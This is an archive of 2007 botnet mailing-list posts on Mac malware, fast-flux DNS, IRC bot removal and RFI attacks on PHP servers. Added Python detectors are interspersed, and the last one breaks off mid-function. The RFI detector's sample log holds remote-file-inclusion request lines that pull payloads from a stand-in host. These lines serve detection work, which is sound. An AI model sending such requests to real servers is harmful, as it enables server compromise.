I'd say we are both right. You look at it from a security researcher stand-point. There is nothing interesting about user-interaction, and it is even kind of lame. From a reasonable perspective, we refuse to believe people will act so .. silly.

> prediction and that we should be very concerned with this. Given the

Not predicting, assessing. Criminal elements have a very clear cost/benefit calculation. For example, they won't release a 0day such as WMF or ANI as long as their revenue goals are met with published ones. They collect statistics on OS, browser, language, which exploit got how many, etc. They have thousands upon thousands of sites infecting users who surf (some of them ad-based on real sites, or defaced sites such as forums that remain with the same content, only now infect people). Then there is also spam directing people to these sites.

Now, a criminal gang (could be the mob, could be one guy) targets the Mac. So much so that they serve different malware by OS-type.

As a security researcher looking at code, bits and bytes, you are simply not usually following what's going on in operational security, where things are bleak. From an operational security standpoint, this equates to what happened in the world of the Internet back when Windows 98 was around. Not what security features it had.

> requirements here, that again being flagrant ignorance where all the above steps are executed (including the explicit admin part)-- what exactly are we supposed to do? If people are willing and able to go through the motions above what can we as security people do to prevent it?
>
> Far too many people in this industry are far too quick to point out how desperate the situation is at all turns, but I don't see many people offering real solutions. But you know, I have to say... If we are

Things are in fact FUBAR. We need new ideas and new solutions as honestly, although we want to feel we make a difference by taking care of this or that malware or this and that CC, we are powerless and have not made a real difference in the past 6 years while things got worse.

We need new solutions and new ideas, and would be more than happy to have new people exploring operational security.

The current state of Internet security is you get slapped -- BAM! -- and you write an analysis about it. (When speaking at ISOI I actually slapped myself -- HARD -- when I said it on stage; not a good idea for future reference.)

> really going to consider this serious, and we are really going to define part of our jobs as being responsible for stopping people who have absolutely no concerns for what they do and are willing to enter their admin credentials into any box that asks for it, then I'd say that there is a *serious* misunderstanding about what security is, and what can be done about it-- either that, or I'm just in the wrong business.
>
> t

Well, we can't choose the risks. They choose us. Sometimes they are cool, sometimes they're not.

I often start emails by saying "first off, this is not the end of the world, the Sun will rise tomorrow and the Internet won't die today". I tire of it. Of course the Internet won't die today, but it is Mac season.

Apple is very much correct by not investing in security first until now -- from a BUSINESS standpoint, however much we as security people in our niche can't get behind it. Things are different now and unfortunately they have a backlog to deal with.

Gadi.
[botnets] mac trojan in-the-wild
For whoever didn't hear, there is a Macintosh trojan in-the-wild being dropped, infecting Mac users. Yes, it is being done by a regular online gang--itw--it is not yet another proof of concept. The same gang infects Windows machines as well, just that now they also target Macs.

http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html
http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html

This means one thing: Apple's day has finally come and Apple users are going to get hit hard. All those unpatched vulnerabilities from years past are going to bite them in the behind. I can sum it up in one sentence: OS X is the new Windows 98.

Investing in security ONLY as a last resort loses money, but everyone has to learn it for themselves.

Gadi Evron.
Re: [botnets] mac trojan in-the-wild
On Wed, 31 Oct 2007, Joel Esler wrote:

> Um. Not only do you have to purposefully go download it, agree to accept the download, then agree to give the software admin privileges. That's 3 accept dialogues and a password type in. Hardly malware.

Not different from many Windows cases. Only Apple has a long history of unpatched vulnerabilities to cope with. The Windows 98 eco-system is about to be re-created now that the itw barrier has been broken for Apple.

Gadi.
[botnets] Community input/questions for ISOI 3?
Hi, like last time, we are looking for community input and questions for the Internet security operations community, to be discussed during ISOI 3. ISOI is happening this Monday and Tuesday; we will likely compile the responses in a few weeks.

We will reply to people personally on issues which bother them, and compile a short text with answers to the community itself. We tried to do this last time around, and encountered a problem with classifying which material the presenters allow for public consumption, and which is to remain private due to obvious concerns. This time around we ask them ahead of time.

The current topics being discussed at ISOI 3 can be located on the schedule: http://isotf.org/isoi3.html

We may be off though, so feel free to ask on any issue which you find to be relevant.

Thanks, we appreciate the community's participation.

Gadi.
Re: [botnets] Alternative Botnet CCs - free chapter from Botnets: The Killer Web App
On Thu, 26 Jul 2007, Craig Holmes wrote:

> As promised, I bought the book and finally received it (thanks for the slow turn around Amazon). I have begun reading it, and although I am only starting the third chapter I am wholly unimpressed.
>
> Before I discuss the text of the book, I am curious to know. Is it a print problem or do many of the graphics in the book look overly blurry or excessively jagged? Some of the pictures look like they were compressed to a monochrome bitmap of about 2k in size (see page 47).
>
> My experience with botnets seems to differ in many ways from the text in the book:
>
> The book begins by describing what SDBot, Agobot, GTBot, etc do. They include lists of ports and vulnerabilities that the given bot exploits, actions it may perform etc. The book doesn't make the point strong enough that a lot of code (especially SDBot code) started off as simply a public offering and evolved through many different trees by people with no organization. These trees criss-crossed without any knowledge of many of the contributors. In fact, as I recall SDBot (at least a couple of versions from sd) was released to the public without a single attack vector. It is my belief that this version is responsible for the most variants due to its availability.
>
> The book seems to be making a point that bots are being used by organized crime. I think this point has been pushed on many fronts of this issue by many people, however I remain doubtful. In my experience, farmers (or bot herders as the book calls them) are packet kiddies out to DoS their moronic buddies or enemies. The botnet was just a natural evaluation from Trinoo/TFN/Trinity/Kaiten or if they're even lamer than Backorifice, etc. Though I do certainly accept that some lone individuals use botnets for monetary gain (advert scams), I wouldn't classify it as organized.
>
> Look at the numbers given in the book:
> - 4.5 Million active botnet computers
> - A small botnet is 10,000 computers
>
> That means that there are about 500 botnets active. The book states only a handful of cases that involved organized crime, possibly 5 cases. That means that they've identified at least 0.01% of the 500 botnets are being run by the big evil organized crime people. Not to say that proves them wrong, but it isn't enough evidence for me. I believe they are sensationalizing this fact quite a bit.
>
> The book paints a pretty diagram showing how people with their cam corders run from the movie theatre directly to their dorm and upload their bootlegs to topsites which are actually botnets. This is a silly notion. A great deal of movies that are available on the internet today (and much software) are released by organized (though not for profit) piracy groups (the 'scene'). These groups do use topsites, but they are FTP servers running on legitimate hardware (a member of the group may be a sysadmin at MIT for example). These topsites and groups are not even remotely affiliated with botnets (or at least weren't in 2002 which is when my experience dates to). The offenders identified (from Drink or Die, Razor1911, etc) wouldn't be caught dead touching a botnet, as it would do great damage to their reputation. Furthermore, these elite groups have very little use for clickthrough scams, distributed storage, or DoS attacks. I feel like the authors are making a far too liberal attempt at connecting the dots on many issues.
>
> I am also slightly disappointed as it seemed much of the book will be focused on general intrusion detection techniques, sandboxing, reporting etc and less on practical cases, motivation, CC methods, encryption and more technical aspects of the bot itself.
>
> I will report my final thoughts when I complete the book.
>
> Craig

Got any comments on the third chapter?

> On Sunday 08 July 2007 21:53, Thomas Raef wrote:
>> Gadi,
>>
>> It's easier for people to just buy the book. I bought it about a month ago and have read it a few times already. Nice work!
[botnets] [Dshield] ISP redirecting IRC traffic to attempt bot removal (fwd)
-- Forwarded message --
Date: Fri, 20 Jul 2007 06:11:25 -0400
From: jayjwa [EMAIL PROTECTED]
Reply-To: General DShield Discussion List [EMAIL PROTECTED]
To: Dshield Mail List [EMAIL PROTECTED]
Subject: [Dshield] ISP redirecting IRC traffic to attempt bot removal

When blocking goes too far, part #2 (working title: "First they came for email, now it's IRC")

Background info:

1) http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/55016

2) The typical command for rbot/urxbot removal of the bot from the bot user's perspective is to issue a command such as "/msg bot .remove"; sometimes "!" is the command prefix, but technically it can be anything. They seem to have forgotten most bots require .login before accepting commands, but there may be some that do not.

3) The code for the server appears altered as well, as it announces multiple, different topics. Normally IRC servers do not do this for the same channel.

Fri Jul 20 05:57:00 EDT 2007:

*** Performing DNS lookup for [70.168.70.4] (server 4)
*** DNS lookup for server 4 [70.168.70.4] returned (1) addresses
*** Connecting to server refnum 4 (70.168.70.4), using address 1 (70.168.70.4:6667)
*** Looking up your hostname...
*** Checking Ident
*** No Ident response
(They lie, I do most certainly run Identd)
*** Welcome to the Internet Relay Network jayjwa
*** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2
*** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2
*** This server was created Thu Dec 6 2001 at 11:52:49 EST
*** localhost.localdomain 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve
*** There are 2 users and 0 invisible on 1 servers
*** I have 2 clients and 0 servers
*** Current local users: 2 Max: 2
*** Current global users: 2 Max: 2
*** Highest connection count: 2 (2 clients) (2 since server was (re)started)
*** - localhost.localdomain Message of the Day -
*** - Where's the kaboom? There was supposed to be an earth shattering kaboom.
*** End of /MOTD command.
*** jayjwa ([EMAIL PROTECTED]) has joined channel #martian_
*** Mode change +nt on channel #martian_ by localhost.localdomain
*** Users on #martian_: @Marvin_ jayjwa
*** Topic for #martian_: .bot.remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: .remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: .uninstall
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: !bot.remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: !remove
*** The topic was set by Marvin_ 3 sec ago
*** Topic for #martian_: !uninstall
*** The topic was set by Marvin_ 3 sec ago
<Marvin_> .bot.remove
<Marvin_> .remove
<Marvin_> .uninstall
<Marvin_> !bot.remove
<Marvin_> !remove
<Marvin_> !uninstall
*** Mode for channel #martian_ is +tn
*** Channel #martian_ was created at Fri Jul 20 05:46:57 2007
User [EMAIL PROTECTED] was not on the names list for channel [#martian_] on server [4] -- adding them
05:51AM [1] jayjwa #martian_ (+nt) (Mail: 56) EPIC5 -- Type /help for help
EPic

To sum this up for those not familiar with IRC: if I was a client of this ISP, and I tried to access the public IRC network irc.ablenet.org, my ISP's nameserver would return knowingly false information to send me to this fake server, which, once there, auto-logs me into a channel and attempts to interact with software I may or may not have running on my machine in an attempt to remove it from my machine.

--
[RBL:Just A Bad Idea] Do not use DNS-RBL; Demand your ISP stop.
Tell RoadRunner/Adelphia, Netzero, etc: don't trash your mail.
http://www.ifn.net/classic/rblstory.htm
http://theory.whirlycott.com/~phil/antispam/rbl-bad/rbl-bad.html

_
SANSFIRE 2007 July 25-August 2 in Washington, DC. 56 courses, SANS top instructors, and a great tools and solutions expo. Register today! http://www.sans.org/info/4651 (brochure code ISC)
Re: [botnets] Alternative Botnet CCs - free chapter from Botnets: The Killer Web App
On Sun, 8 Jul 2007, Gadi Evron wrote:

> Syngress was kind enough to allow me to post the chapter I wrote for Botnets: The Killer Web Application (http://www.syngress.com/catalog/?pid=4270) on my blog at SecuriTeam as a free sample.
>
> It is the third chapter in the book, and requires some prior knowledge of what a botnet CC (command and control) is. It is basic, short, and to my belief covers quite a bit. It had to be short, as I had just 5 days to write it while doing other things, and not planning on any writing, but it is pretty good in my completely unbiased opinion. ;)
>
> For the chapter: http://blogs.securiteam.com/index.php/archives/953
>
> Direct link: http://www.beyondsecurity.com/whitepapers/005_427_Botnet_03.pdfB

Erm.. http://www.beyondsecurity.com/whitepapers/005_427_Botnet_03.pdf

> For the full book, you would need to spend the cash: http://www.syngress.com/catalog/?pid=4270
>
> Enjoy!
>
> Gadi Evron.
Re: [botnets] active Bandook site
We are on it.

On Thu, 12 Apr 2007, PinkFreud wrote:
[botnets] [funsec] Widespread vandalism of wikis by some type of bot (fwd)
-- Forwarded message --
Date: Wed, 11 Apr 2007 02:32:46 -0500
From: Reed Loden [EMAIL PROTECTED]
To: funsec@linuxbox.org
Subject: [funsec] Widespread vandalism of wikis by some type of bot

I'm seeing _lots_ of wikis vandalized by bots today (Tuesday/Wednesday), and I was wondering if anybody else had noticed this and/or had any more information on what is happening.

The wikis I've seen this on all run MediaWiki, so I'm unsure if it is affecting only MediaWiki-based wikis or if it extends to others. Also, the bots only seem to be able to attack a wiki if e-mail registration is not required. The bots create accounts and use the accounts for the vandalism, but if e-mail confirmation is set to on, it seems to stop them. Another thing that seems to stop them is a captcha.

As far as actions taken by the bots, I've seen HTML that was encoded be decoded, blank lines deleted, and content completely removed. The last one in the list scares me the most, as the bots just eat away at the content on the wiki. All changes they make are marked as minor and each account only seems to make one change before moving on (or registering a new account?).

All the bots seem to have the same type of random account names that seem only to be alphanumeric, contain six characters, and have the first and fourth character be uppercase. Some examples that I found on one of the wikis include: VtjX6p, OcmFis, Gb5Jab, Pm2O0t, SvhYc0, QusUdr, LiiRq5, etc.

I'm not sure if this is some type of new virus/trojan infecting users and then vandalizing wikis, but they are definitely coming from multiple IPs. I'm interested in knowing if the IPs are all from a specific area or if they are spread out over various ISPs. Also, I would like to know how the bots are finding the wikis to vandalize. If they are using a specific query on a search engine, the respective search engine might be able to help stop this madness.

If anybody has any information about these bots, please let me know.

Thanks,
~reed

--
Reed Loden - [EMAIL PROTECTED]

___
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
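As an added illustration, not part of Reed's post and not MediaWiki code, here is a Python screen over a constructed recent-changes export that applies the account-name pattern he reports (six alphanumeric characters, first and fourth uppercase) and the behavioural tells (one edit per account, marked minor, shrinking the page) to shortlist accounts for review; the regex, the scoring threshold and the sample edits are assumptions.

```python
import re
from collections import defaultdict

# Reported naming pattern: six alphanumeric characters, first and fourth
# uppercase (VtjX6p, OcmFis, Gb5Jab, ...). The report constrains nothing
# else, so the other positions accept any alphanumeric character.
VANDAL_NAME_RE = re.compile(r"^[A-Z][A-Za-z0-9]{2}[A-Z][A-Za-z0-9]{2}$")

# Constructed recent-changes export (not real wiki data): one row per edit.
SAMPLE_CHANGES = [
    {"user": "VtjX6p", "title": "Main_Page", "minor": True,  "size_before": 4120, "size_after": 0},
    {"user": "OcmFis", "title": "Install",   "minor": True,  "size_before": 2310, "size_after": 2294},
    {"user": "Gb5Jab", "title": "FAQ",       "minor": True,  "size_before": 1800, "size_after": 1792},
    # A legitimate editor whose name happens to fit the pattern: two edits, both additions.
    {"user": "JoeSix", "title": "Roadmap",   "minor": False, "size_before": 900,  "size_after": 1450},
    {"user": "JoeSix", "title": "FAQ",       "minor": True,  "size_before": 1792, "size_after": 1810},
    {"user": "reed",   "title": "Main_Page", "minor": False, "size_before": 0,    "size_after": 4120},
]


def name_matches(user):
    """True if the account name fits the reported bot naming pattern."""
    return VANDAL_NAME_RE.match(user) is not None


def behaviour_score(edits):
    """Score the reported tells: a single edit, all marked minor, net content removed."""
    score, reasons = 0, []
    if len(edits) == 1:
        score += 1
        reasons.append("single edit, then silent")
    if all(e["minor"] for e in edits):
        score += 1
        reasons.append("all edits marked minor")
    removed = sum(max(0, e["size_before"] - e["size_after"]) for e in edits)
    if removed > 0:
        score += 1
        reasons.append(f"removed {removed} bytes")
    return score, reasons


def flag_suspect_accounts(changes, min_score=2):
    """Return {user: (score, reasons)} for pattern-named accounts that also behave like the bots.

    The name pattern is the gate; behaviour decides, so a human whose name
    happens to fit the pattern is not flagged for ordinary editing.
    """
    by_user = defaultdict(list)
    for change in changes:
        by_user[change["user"]].append(change)
    suspects = {}
    for user, edits in by_user.items():
        if not name_matches(user):
            continue
        score, reasons = behaviour_score(edits)
        if score >= min_score:
            suspects[user] = (score, reasons)
    return suspects


if __name__ == "__main__":
    for user, (score, reasons) in flag_suspect_accounts(SAMPLE_CHANGES).items():
        print(f"{user}: score {score}: {'; '.join(reasons)}")
```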
[botnets] On-going Internet Emergency and Domain Names
There is a current on-going Internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated. This incident is currently being handled by several operational groups.

This past February, I sent an email to the Reg-Ops (Registrar Operations) mailing list. The email, which is quoted below, states how DNS abuse (not the DNS infrastructure) is the biggest unmitigated current vulnerability in day-to-day Internet security operations, not to mention abuse. While we argue about this or that TLD, there are operational issues of the highest importance that are not being addressed.

The following is my original email message, elaborating on these above statements. Please note this was indeed just an email message, sent among friends.

- Begin quoted message -

Date: Fri, 16 Feb 2007 02:32:46 -0600 (CST)
From: Gadi Evron
To: [EMAIL PROTECTED]
Subject: [reg-ops] Internet security and domain names

Hi all, this is a tiny bit long. Please have patience, this is important.

On this list (which we maintain as low-traffic) you guys (the registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call The Internet Security Operations Community.

We face problems today though, that you can not help us solve under the current setting. But only you can help us coming up with new ideas.

Day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can't handle this. I don't blame you.

In emergencies, we can only mitigate threats if one of you or yours are in control..

Just a week ago we faced the problem of the Dolphins stadium being hacked and malicious code being put on it:

1. We tracked down all the IP addresses involved and mitigated them (by "we" I mean also people other than me. Many were involved).
2. We helped the Dolphins Stadium IT staff take care of the malicious code on their web page (specifically Gary Warner).
3. We coordinated with law enforcement.
4. We coordinated that no one does a press release which will hurt law enforcement.
5. We did a lot more. Including actually convincing a Chinese registrar to pull one of the domains in question. A miracle. There was another domain to be mitigated, unsuccessfully.

One thing though - at a second's notice, this could all be for nothing as the DNS records could be updated with new IP addresses. There were hundreds of other sites also infected. Even if we could find the name server admin, some of these domains have as many as 40 NSs. That doesn't make life easy. Then, these could change, too.

This is the weakest link online today in Internet security, which we in most cases can't mitigate, and the only mitigation route is the domain name.

Every day we see two types of fast-flux attacks:
1. Those that keep changing A records by using a very low TTL.
2. Those that keep changing NS records, pretty much the same.

Now, if we have a domain which can be mitigated to solve such emergencies and one of you happen to run it, that's great... However, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. Sorry for the language.

ICANN has a lot of policy issues as well, and the good guys there can't help. ICANN has enough trouble taking care of all those who want money for .com, .net or .xxx.

All that being said, the current situation can not go on. We can no longer ignore it nor are current measures sufficient. It is imperative that we find some solutions, as limited as they may be.

We need to be able to get rid of domain names, at the very least during real emergencies. I am aware how it isn't always easy to distinguish what is good and what is bad. Still, we need to find a way.

Members of reg-ops: What do you think can be conceivably done? How can we make a difference which is REALLY needed on today's Internet?

Please participate and let me know what you think, we simply can no longer wait for some magical change to happen.

Gadi.

- End of quoted message -

Thousands of malicious domain names and several weeks later, we face the current crisis. The 0day vulnerability is exploited in the wild, and mitigating the IP addresses is not enough. We need to be able to get rid of malicious domain names.

We need to be able to mitigate attacks on the weakest link - DNS, which are not necessarily solved by DNS-SEC or Anycast.

On Reg-Ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem
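As an added example (mine, not from the quoted message), a Python classifier for the two fast-flux patterns Gadi describes, run over constructed DNS observations: it counts distinct A and NS answers per name and the lowest TTL seen for each, and labels A-record flux and NS-record flux. The thresholds (five distinct answers under a TTL of 300 s), the `.example` names and the TEST-NET addresses are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    """One answer seen by a resolver or passive-DNS sensor."""
    t: int        # seconds since the start of monitoring
    name: str
    rtype: str    # "A" or "NS"
    ttl: int
    rdata: str


# Constructed observations (not real data): reserved .example names, TEST-NET
# addresses, six lookups a minute apart per name.
SAMPLE_OBSERVATIONS = (
    # Type 1 from the message: the A record changes on every lookup under a 60 s TTL.
    [Observation(60 * i, "aflux.example", "A", 60, f"203.0.113.{10 + i}") for i in range(6)]
    + [Observation(60 * i, "aflux.example", "NS", 3600, "ns1.aflux.example") for i in range(6)]
    # Type 2: the address holds still, the delegation keeps moving to new name servers.
    + [Observation(60 * i, "nsflux.example", "A", 300, "198.51.100.7") for i in range(6)]
    + [Observation(60 * i, "nsflux.example", "NS", 120, f"ns{i}.nsflux.example") for i in range(6)]
    # A normal domain: long TTL, same answer every time.
    + [Observation(60 * i, "stable.example", "A", 86400, "192.0.2.44") for i in range(6)]
    + [Observation(60 * i, "stable.example", "NS", 86400, "ns1.stable.example") for i in range(6)]
)


def classify_flux(observations, distinct_threshold=5, ttl_max=300):
    """Per name: distinct A and NS answers, lowest TTL per type, and the flux labels.

    A type is flagged when at least distinct_threshold different answers were
    seen and its lowest TTL is at or below ttl_max (both thresholds assumed).
    """
    per_name = defaultdict(lambda: {"A": set(), "NS": set(), "ttl": {}, "t": []})
    for obs in observations:
        rec = per_name[obs.name]
        rec[obs.rtype].add(obs.rdata)
        rec["ttl"][obs.rtype] = min(obs.ttl, rec["ttl"].get(obs.rtype, obs.ttl))
        rec["t"].append(obs.t)

    results = {}
    for name, rec in per_name.items():
        flags = []
        for rtype, label in (("A", "A-record flux"), ("NS", "NS-record flux")):
            if len(rec[rtype]) >= distinct_threshold and rec["ttl"].get(rtype, ttl_max + 1) <= ttl_max:
                flags.append(label)
        results[name] = {
            "distinct_a": len(rec["A"]),
            "distinct_ns": len(rec["NS"]),
            "min_ttl": dict(rec["ttl"]),
            "span_s": max(rec["t"]) - min(rec["t"]),
            "flags": flags,
            # The message's point: once either pattern is present, blocking the
            # addresses seen so far buys little; the domain is the lever left.
            "ip_block_effective": not flags,
        }
    return results


if __name__ == "__main__":
    for name, info in classify_flux(SAMPLE_OBSERVATIONS).items():
        print(f"{name}: {info['distinct_a']} A / {info['distinct_ns']} NS over {info['span_s']} s, "
              f"min TTL {info['min_ttl']}, flags {info['flags'] or ['none']}")
```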
Re: [botnets] Web Server Botnets and Server Farms as Attack
On Sat, 17 Feb 2007, Tom wrote:

> First, I would like to apologize to all for these multiple copies of my post. No one, including myself, wants to see multiple copies of a post. When I replied to Gadi's email I replied to all. Somehow this caused a list loop creating multiple copies. In the future, I will reply solely to this list as I have for this post in the hopes that that will stop the duplicate mail problem. However, I would ask the list moms to look into the issue.

Just happens when SF lists are CC:'d.

> Tom
Re: [botnets] defacements for the installation of malcode
On Wed, 14 Feb 2007, Jeremy Epstein wrote:

> There was also a really entertaining presentation from Patrick Petersen of IronPort at RSA, in which he mentioned use of defaced web sites as proxy forwarders for spammers. According to the presentation, the spammers have a fairly sophisticated toolkit that takes over the site and turns it into a pharmacy (or whatever) redirect site. A different goal from the Websense presentation, but still a purpose other than simple defacement.

Indeed. I can post some screenshots of some of these tools if you are interested in them. Anon remailers, spam tools, etc.

More and more spam is being sent using web servers. I am looking for someone to volunteer to create SpamAssassin rules based on how these tools send mail.

You can find my writeup and link to article on this subject here: http://blogs.securiteam.com/index.php/archives/815

Gadi.

> --Jeremy
>
> -----Original Message-----
> From: Gadi Evron [mailto:[EMAIL PROTECTED]
> Sent: Monday, February 12, 2007 11:17 AM
> To: [EMAIL PROTECTED]
> Cc: botnets@whitestar.linuxbox.org; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com
> Subject: defacements for the installation of malcode
>
> Websense just released a blog post on how sites get defaced for malicious purposes other than the defacement itself, such as installing malicious software on visiting users. This is yet another layer of abuse of web server attack platforms.
>
> You can find their post here: http://www.websense.com/securitylabs/blog/blog.php?BlogID=109
>
> Gadi.
[botnets] Storm Worm DDoS Attack - Research - SecureWorks
http://www.secureworks.com/research/threats/view.html?threat=storm-worm

Interesting article about the anatomy of the Storm Worm malware. The article also mentions that they believe the SpamHaus DDoS attack was simply collateral damage between multiple warring botnet operators.

(Greetings to Joel Leach)
[botnets] Web Server Botnets and Server Farms as Attack Platforms
Are file inclusion vulnerabilities equivalent to remote code execution? Are servers (both Linux and Windows) now the lower hanging fruit rather than desktop systems?

In the February edition of the Virus Bulletin magazine, we (Kfir Damari, Noam Rathaus and Gadi Evron (me) of Beyond Security) wrote an article on cross platform web server malware and their massive use as botnets, spam bots and generally as attack platforms.

Web security papers deal mostly with secure coding and application security. In this paper we describe how these are taken to the next level with live attacks and operational problems service providers deal with daily.

We discuss how these attacks work using (mainly) file inclusion vulnerabilities (RFI) and (mainly) PHP shells. Further, we discuss how ISPs and hosting farms suffer tremendously from this, and what can be done to combat the threat.

I'd like to write more on this here, and ask for the community's feedback on what others see in this field and how you deal with similar issues.

Malware is often built to operate within a certain OS environment. Web server malware is completely cross-platform (as long as a web daemon which supports scripting can be found, such as IIS, Apache, etc.). These malware attack the web application first, and only then further compromise takes place platform by platform, using the web server's privileges.

Most web servers are being compromised by these attacks as a result of an insecure web application written in PHP, although attacks for other scripting languages such as Perl and ASP are also in-the-wild. The main reason for this is that many different PHP applications are available online, and often freely as open source, which makes them a popular selection for use on many web sites. Another reason for the popularity of attacks against PHP applications is that writing securely in PHP is very difficult, which makes most of these PHP applications vulnerable to multiple attacks, with hundreds of new vulnerabilities released publicly every month.

While in the past botnets used to be composed of mainly broadband end users running Windows, today we can see more and more server botnets we can refer to as IIS botnets or Linux botnets as a direct result of these attacks.

One of the conclusions we reached was that although the technologies used are not new (RFI, PHP shells, etc.) the sheer scale of the problem is what's interesting. In our research as detailed in the Virus Bulletin article we recognize that vulnerabilities such as file inclusion, as simple as they may be, are equivalent to remote code execution in effect.

Although escalation wars, which are reactive in nature, are a solution we hate and are stuck with on botnets, spam, fraud and many other fronts, this front of web server attacks stands completely unopposed and controlled by the bad guys. In our research we detail how over time, when aggregated, most attacks come from the same IP addresses without these ever getting blocked.

ISPs and hosting farms selling low-cost hosting services can not cope with this threat, especially where an attack against one user running such an application can compromise a server running 3000 other sites.

Another issue discussed was the formation of the Web Honeynet Task Force ( http://www.webhoneynet.net/ renamed from the Web Honeynet Project to avoid confusion with the honeynet project).

I write more about this and host the paper on my blog at SecuriTeam ( http://blogs.securiteam.com/index.php/archives/815 ). All rights for the article itself belong to the Virus Bulletin magazine.

Gadi Evron.
[botnets] defacements for the installation of malcode
Websense just released a blog post on how sites get defaced for malicious purposes other than the defacement itself, such as installing malicious software on visiting users. This is yet another layer of abuse of web server attack platforms.

You can find their post here: http://www.websense.com/securitylabs/blog/blog.php?BlogID=109

Gadi.
Re: [botnets] Germany, Austria and Switzerland building biggest botnet ever
Thread over, FUD elsewhere. Thanks.
[botnets] Web Honeynet Project: announcement, exploit URLs this Wednesday
[ Warning: this email message includes links to live web server malware propagated this Wednesday via file inclusion exploits. These links are not safe! ]

Hello.

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will in the next few months announce research on real-world web server attacks which infect web servers with: tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL injection and XSS attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

These attacks form botnets constructed from web servers (mainly IIS and Apache on Linux and Windows servers) and transform hosting farms/colos to attack platforms.

Most of these tools are being injected by (mainly) file inclusion attacks against (mainly) PHP web applications, as is well known and established.

PHP (or scripting) shells, etc. have been known for a while, as well as file inclusion (or RFI) attacks, however, mostly as something secondary and not much (if any - save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

The bad guys currently exploit, create botnets and deface in a massive fashion and force ISPs and colos to combat an impossible situation where any (mainly) PHP application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.
What is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) - meaning aside from research, the Web Honeynet Project will also release actionable data on offensive IP addresses, URLs and on the tools themselves to be made available to operational folks, so that they can mitigate the threat.

It's long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. Several folks (and quite loudly - me) have been warning about this for a while, now it's time to take action instead of talk. :)

Note: Below you can find sample statistics on some of the Web Honeynet Project information for this last Wednesday, on file inclusion attacks seeding malware. You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such tools) will be made public in the February edition of the Virus Bulletin magazine, from: Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project would like to thank Beyond Security ( http://www.beyondsecurity.com ) for all the support.

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

Gadi.

Sample report and statistics (for Wednesday the 10th of January, 2007):

IP | Hit Count | Malware (Count), ...
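Both the RFI post earlier in this archive and the announcement above rest on the same observation: the inclusion attempt is visible in the web server's own access log, and repeat sources are easy to aggregate once you look. The following Python is an added example, not code from the list or from the Web Honeynet Project: it parses constructed combined-format log lines, extracts remote URLs smuggled into query parameters, and builds the same "IP | Hit Count | Malware (Count)" report. All IPs, host names and parameter names are placeholders.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# NCSA combined log format, as written by Apache (and IIS with a matching
# log definition); only the fields the report needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A query parameter pointing at a remote resource is the RFI signature: with
# allow_url_fopen (later allow_url_include) on, include()/require() fetches it.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log (placeholder IPs and hosts), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jan/2007:03:14:07 +0000] "GET /index.php?page=http://payload.example.net/cmd.txt? HTTP/1.1" 200 512
192.0.2.10 - - [10/Jan/2007:03:14:09 +0000] "GET /components/com_foo/foo.php?path=http://payload.example.net/cmd.txt?? HTTP/1.1" 200 512
192.0.2.10 - - [10/Jan/2007:03:14:11 +0000] "GET /admin/index.php?inc=http%3A%2F%2Fother.example.org%2Finjek.txt%3F HTTP/1.0" 404 281
198.51.100.7 - - [10/Jan/2007:04:02:55 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096
198.51.100.7 - - [10/Jan/2007:04:03:01 +0000] "GET /index.php?page=ftp://payload.example.net/shell.gif? HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2007:05:00:00 +0000] "POST /login.php HTTP/1.1" 302 0
"""


def parse_line(line):
    """Return the captured fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_payloads(target):
    """Remote URLs found in the query string of a request target.

    Attackers append one or more '?' to the payload URL so that whatever the
    application concatenates after the parameter becomes a query string on
    their server; the trailing '?' are stripped so variants aggregate together.
    """
    query = urlsplit(target).query
    found = []
    for _, value in parse_qsl(query, keep_blank_values=True):
        value = value.strip()
        if REMOTE_RE.match(value):
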